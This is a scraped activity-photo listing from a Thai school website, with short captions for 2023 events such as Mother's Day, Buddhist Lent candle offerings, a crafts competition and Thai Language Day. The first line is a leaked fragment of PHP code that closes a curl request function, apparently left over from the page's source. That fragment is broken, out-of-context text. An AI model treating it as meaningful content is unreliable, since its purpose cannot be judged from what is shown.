$e=curl_exec($d); curl_close($d); return $e; } ?> ภาพกิจกรรม - Sansailuang School | https://ssl.ac.th

ภาพกิจกรรม

กิจกรรมวันแม่แห่งชาติ 12 สิงหาคม 2566 โรงเรียนสันทรายหลวงแผน..

กิจกรรมวันแม่แห่งชาติ ประจำปีการศึกษา 2566

งานแข่งขันศิลปหัตถกรรมนักเรียนครั้งที่ 71 ระดับเครือข่ายพัฒน..

ร่วมถวายเทียนประเพณีเข้าพรรษา ณ วัดสันทรายหลวง

คุณหมอ.ชัยนันท์ ,แม่ครู.สมเพชร ชาญมานนท์ พร้อมครอบครัว ได้มี..

ปรับถนนแผนกอนุบาล

ถวายเทียนเนื่องในโอกาสวันเข้าพรรษา

การอบรมเชิงปฎิบัติการเยวชนพลเมือง ณ ศูนย์วิจัยแม่เหียะ คณะเก..

พิธีจุดเทียนชัยถวายพระพรชัยมงคล เฉลิมพระชนมพรรษาพระบาทสมเด็จ..

ประชุมวางแผนออนไลน์โครงการคุ้มครองเด็กเพื่อความปลอดภัยจากสื่..

ขอขอบคุณมูลนิธิสโกลาร์ส ออฟ ซัสทีแนนซ์มอบ ขนม.ผัก ให้กับนักเ..

งานวันภาษาไทยแห่งชาติ ปีการศึกษา 2566